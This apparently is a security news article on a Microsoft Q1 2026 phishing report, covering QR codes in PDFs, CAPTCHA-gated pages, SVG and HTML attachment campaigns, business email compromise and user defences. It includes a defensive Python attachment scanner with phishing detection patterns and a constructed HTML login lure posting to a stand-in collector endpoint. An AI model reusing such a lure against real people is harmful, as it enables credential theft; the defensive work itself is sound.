
May 01, 2026 · 8 min read

Microsoft Just Blocked 8.3 Billion Phishing Emails in 90 Days—QR Codes Hidden in PDFs Drove a 146% Surge

Microsoft's Q1 2026 threat report shows attackers retooling faster than filters can keep up. QR phishing more than doubled, HTML attachments became the preferred payload, and a single March campaign sent 1.5 million malicious messages to 179,000 organizations across 43 countries.

Image: An open laptop on a cluttered desk showing an abstract email security dashboard, with a printed PDF folded next to it revealing a partial QR code, illustrating how attackers hide credential capture links inside attachments.

The Numbers That Matter

Microsoft's quarterly threat trends report for January through March 2026 lands with a single dominant figure: 8.3 billion email based phishing threats blocked across Microsoft Defender for Office 365 telemetry. The volume started high—January alone accounted for 2.9 billion—dipped in February, and ended at 2.6 billion in March. Link based attacks made up 78% of all email threats over the quarter.

Per Microsoft's data published on SQ Magazine, the headline number is the one that's stayed roughly flat across quarters. What changed in Q1 2026 is the composition: which attack types are growing, which payload formats are winning, and which detection layers are getting actively bypassed.

QR Phishing: 7.6 Million in January, 18.7 Million in March

QR code phishing—often abbreviated quishing—was the fastest growing category Microsoft tracked. In January, the company blocked 7.6 million QR phishing attacks. By March, that number reached 18.7 million, a 146% increase in 90 days.

The mechanic is what makes it effective. A phishing email that contains a clickable URL gets scanned by every modern email security gateway. The URL is reputation checked against threat feeds, sandboxed, sometimes followed in a virtualized browser. A phishing email that contains a PDF attachment with a QR code embedded inside gets none of that. The gateway sees a PDF. The user sees a "scan to verify your account" prompt. The phone—which has fewer protections than the corporate inbox—follows the link.

Microsoft's data showed PDFs as the vehicle of choice: 70% of QR phishing in March arrived as a PDF attachment, up from 65% in January. The remainder came from other formats. QR codes embedded directly in email body HTML grew even faster—a 336% surge in March alone—but still represented only 5% of total QR volume.

CAPTCHA Gating: 11.9 Million Attacks in March

The second fastest growing technique in the report was CAPTCHA gated phishing. In March, Microsoft tracked 11.9 million CAPTCHA gated attacks—a 125% surge from earlier in the quarter, and the highest monthly volume Microsoft has seen in the past year.

CAPTCHA gating sits in front of the credential capture page. A real victim solves the CAPTCHA and reaches the fake login. An automated security crawler—the kind Microsoft, Google, and PhishTank run continuously—gets stuck at the CAPTCHA wall, can't render the page behind it, and walks away. The phishing URL stays on the open web for hours longer than it otherwise would.

The trend tracks with the rise of phishing as a service kits like Bluekit, which ship with anti-bot cloaking and CAPTCHA modules built in. The market share data inside Microsoft's report is telling: the dominant adversary-in-the-middle (AiTM) kit, Tycoon2FA, fell from a 75% share of the AiTM market in late 2025 to 41% by March 2026—not because the technique stopped working, but because new kits with better cloaking entered the market and split the operator base.

Two March Campaigns Hit 232,000 Organizations

Volume aside, the report's most striking detail is the size of individual campaigns. Microsoft documented two:

  • February 23 to 25: A single SVG based phishing campaign delivered 1.2 million messages to more than 53,000 organizations across 23 countries.
  • March 17: A single HTML attachment campaign delivered 1.5 million confirmed malicious messages to 179,000 organizations across 43 countries.

Both campaigns relied on the same insight: detection engines tuned to URL reputation and macro execution have limited visibility into rendered HTML and SVG. An SVG file is technically an image. A modern phishing SVG includes scripted content that builds the credential capture form inside the file itself, bypasses the URL scanners entirely, and renders the form locally when the recipient opens the attachment in a browser preview.

HTML Attachments Are the New Macros

Across the quarter, the payload mix shifted decisively. Credential phishing climbed from 89% of payloads in January to 94% in March. Traditional malware delivery—the old pattern of attaching a Word document with a malicious macro—dropped to 5% to 6% by quarter end. Two attachment formats absorbed the difference:

  • HTML attachments: Reached 31% of payloads in March, a 175% increase over the start of the quarter.
  • PDF attachments: Reached 28% of payloads in March, the highest monthly volume in over a year.

An HTML attachment is, functionally, a phishing page that travels inside the email rather than living on a server somewhere. When the user opens it, the browser renders the credential form locally—no network request to a flagged domain, no DNS lookup against a blocked nameserver, no opportunity for Safe Browsing or SmartScreen to intervene before the form is on screen. Only when the victim submits credentials does the attachment make a single outbound POST to the exfiltration endpoint, by which point the operator has what they came for.
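The two attachment classes described above (scripted SVGs that build the form inside the file, and HTML attachments that render the credential form locally and POST only on submit) share a detection surface: the attachment body itself, which a gateway can inspect before anyone opens it. The following is an added example, not code from Microsoft's report or any product it mentions. It uses only the Python standard library to parse a message, pull every attachment, and score HTML/SVG bodies on indicators such as inline script, a form posting to an external URL, a password field, or a foreignObject (HTML embedded in an SVG). PDFs are flagged for a separate QR pass rather than decoded, since the stdlib has no QR decoder. The sample message, its sender, the `collector.invalid` endpoint, and the indicator list are all constructed for this example.

```python
import email
import re
from email import policy
from email.message import EmailMessage
from typing import Dict, List

# Indicators that an attachment is itself a phishing page. Heuristics written
# for this example; they are not rules taken from Microsoft's report.
INDICATORS = [
    ("inline_script", re.compile(r"<script\b", re.I)),
    ("credential_form", re.compile(r"<form\b", re.I)),
    ("password_field", re.compile(r"type\s*=\s*['\"]?password", re.I)),
    ("base64_decode", re.compile(r"\batob\s*\(", re.I)),
    ("foreign_object", re.compile(r"<foreignObject\b", re.I)),  # HTML inside an SVG
    ("meta_refresh", re.compile(r"http-equiv\s*=\s*['\"]?refresh", re.I)),
]
HIGH_RISK = {"inline_script", "credential_form", "password_field", "foreign_object"}
FORM_ACTION = re.compile(r"<form\b[^>]*\baction\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def _kind(filename: str, content_type: str) -> str:
    """Classify by declared MIME type first, then by extension (attackers mislabel both)."""
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    if content_type in ("text/html", "application/xhtml+xml") or ext in ("html", "htm"):
        return "html"
    if content_type == "image/svg+xml" or ext == "svg":
        return "svg"
    if content_type == "application/pdf" or ext == "pdf":
        return "pdf"
    return "other"


def classify_attachment(filename: str, content_type: str, payload: bytes) -> Dict:
    """Return the attachment kind, the indicators found, and a risk label."""
    kind = _kind(filename or "", content_type.lower())
    hits: List[str] = []
    if kind in ("html", "svg"):
        text = payload.decode("utf-8", errors="replace")
        hits = [label for label, rx in INDICATORS if rx.search(text)]
        for m in FORM_ACTION.finditer(text):
            if m.group(1).lower().startswith(("http://", "https://")):
                hits.append("form_posts_to:" + m.group(1))  # the single outbound POST target
    elif kind == "pdf":
        # No QR decoding here: route the PDF to a downstream image/QR pass instead of
        # letting "it is only a PDF" end the inspection.
        hits.append("pdf_needs_qr_scan")

    if kind in ("html", "svg") and any(h in HIGH_RISK or h.startswith("form_posts_to:") for h in hits):
        risk = "high"
    elif kind == "pdf":
        risk = "review"
    elif hits:
        risk = "medium"
    else:
        risk = "low"
    return {"filename": filename, "kind": kind, "indicators": hits, "risk": risk}


def scan_message(raw: bytes) -> List[Dict]:
    """Parse an RFC 5322 message and classify every attachment it carries."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return [
        classify_attachment(part.get_filename() or "", part.get_content_type(),
                            part.get_payload(decode=True) or b"")
        for part in msg.iter_attachments()
    ]


def build_sample_message() -> bytes:
    """Constructed message: one HTML lure, one scripted SVG, one benign SVG, one PDF stub."""
    msg = EmailMessage()
    msg["From"] = "it-support@example.net"  # constructed sender
    msg["To"] = "finance@example.com"
    msg["Subject"] = "Action required: verify your mailbox"
    msg.set_content("Open the attached form to keep your mailbox active.")
    html_lure = (
        '<html><body><h2>Sign in to view the shared document</h2>'
        '<form id="login" action="https://collector.invalid/post" method="post">'
        '<input name="email"><input name="pw" type="password"><button>Sign in</button></form>'
        '<script>/* constructed: would submit the fields to the form action */</script>'
        '</body></html>'
    )
    msg.add_attachment(html_lure.encode(), maintype="text", subtype="html", filename="SecureDoc.html")
    scripted_svg = (
        '<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400">'
        '<foreignObject width="600" height="400"><div xmlns="http://www.w3.org/1999/xhtml">'
        'Loading invoice...</div></foreignObject>'
        '<script>/* constructed: would build a login form inside the foreignObject */</script></svg>'
    )
    msg.add_attachment(scripted_svg.encode(), maintype="image", subtype="svg+xml", filename="invoice.svg")
    logo_svg = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>'
    msg.add_attachment(logo_svg.encode(), maintype="image", subtype="svg+xml", filename="logo.svg")
    msg.add_attachment(b"%PDF-1.4 constructed placeholder, not a real document",
                       maintype="application", subtype="pdf", filename="verify.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in scan_message(build_sample_message()):
        print(finding)
```

Run as a script, it prints one finding per attachment: the HTML lure and the scripted SVG come back `high`, the plain logo SVG `low`, and the PDF `review`. The point of classifying by both MIME type and extension is that a gateway matching only on the declared Content-Type misses an SVG shipped as `image/png` or an HTML file named `.pdf.html`; the point of the `review` label is that a PDF attachment should exit the pipeline into an image/QR decoder, not into the inbox.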

Business Email Compromise: 10.7 Million Attacks, Mostly Boring

Microsoft tracked 10.7 million BEC attempts across the quarter. The composition of those attempts is, in some ways, more interesting than the total. 82% to 84% of BEC content was generic outreach—"Hi, are you available? I need a quick favor"—designed to elicit a reply rather than steal anything in the first message. Only 9% to 10% contained explicit financial or document requests in the initial email. Gift card requests, the cliché of BEC reporting, fell 37% in February before rebounding 108% in March.

The pattern reflects what BEC operators have been moving toward for years: open with a soft message, get the target into a thread, then escalate. The first email's job is to get past the spam filter and earn a reply. The second or third email asks for the wire.

Why the Inbox Itself Is the New Battleground

Read together, the Q1 trends point to a single shift: attackers are systematically moving capabilities inside the email itself. QR codes that defer the click to a phone outside the corporate perimeter. SVG and HTML attachments that render the credential form locally. CAPTCHA gates that block crawlers but not victims. Every move is calibrated against the gateway's blind spots.

For security teams, the implication is uncomfortable: the gateway can no longer carry the load by itself. The kinds of detection that catch a typical 2024 phishing email—URL reputation, sandbox detonation of attached executables, macro static analysis—miss a 2026 phishing email that hides inside a PDF QR code or a single rendered HTML page. ESET's recent threat report made the same point from a different telemetry set: the gap between what gateways inspect and what attackers ship is widening.

What This Means for Gmail and Outlook Users

Microsoft's data is from Defender for Office 365, but the techniques cross over to Gmail. Google's own anti phishing telemetry shows the same QR shift. Apple Mail, Yahoo, and ProtonMail face the same attachment classes. The defensive moves below apply broadly:

  • Treat any QR code in an email as suspicious. Legitimate businesses rarely embed QR codes in email when a normal link works. If you must scan, copy the destination URL from the QR app's preview and inspect the domain before opening.
  • Don't open HTML or SVG attachments from unknown senders. If the sender is known but the attachment is unexpected, confirm out of band before opening. The act of opening renders the page.
  • Use phishing resistant authentication. Hardware security keys and platform passkeys defeat the AiTM kits behind the CAPTCHA wall. TOTP and SMS codes do not.
  • Audit OAuth grants and active sessions monthly. A captured session cookie keeps working until expired or revoked.
  • Be skeptical of unsolicited "quick favor" emails. Most BEC starts that way, and 84% of it never explicitly asks for money in the first message.

The Filter Arms Race Is Public Now

Microsoft publishing 8.3 billion as a quarterly number is not a flex. It's a tacit admission that the filter side of the arms race is at saturation. Even at that scale, attackers are pushing payloads through—routinely, at million message campaign volumes, with payload formats that bypass the dominant detection model. The numbers in the report are upper bounds on what got blocked, not what got delivered. The volume that did reach inboxes—Microsoft does not break it out—is what every user sees in their spam folder, their primary tab, and increasingly, their PDF attachment list.

The other lesson is structural. The kits responsible for these numbers—Bluekit, the Tycoon successors, the SVG generators—are commodity products. Operators rent them. Targeting lists like the 6.8 billion email dump on BreachForums are commodity inputs. The 1.5 million message campaign that hit 179,000 organizations in a single day on March 17 was within reach of any operator with a few hundred dollars and a kit subscription.

For now, the gateway is still doing most of the work. The Q1 2026 numbers say the gateway is also, increasingly, on the wrong side of the technique curve.
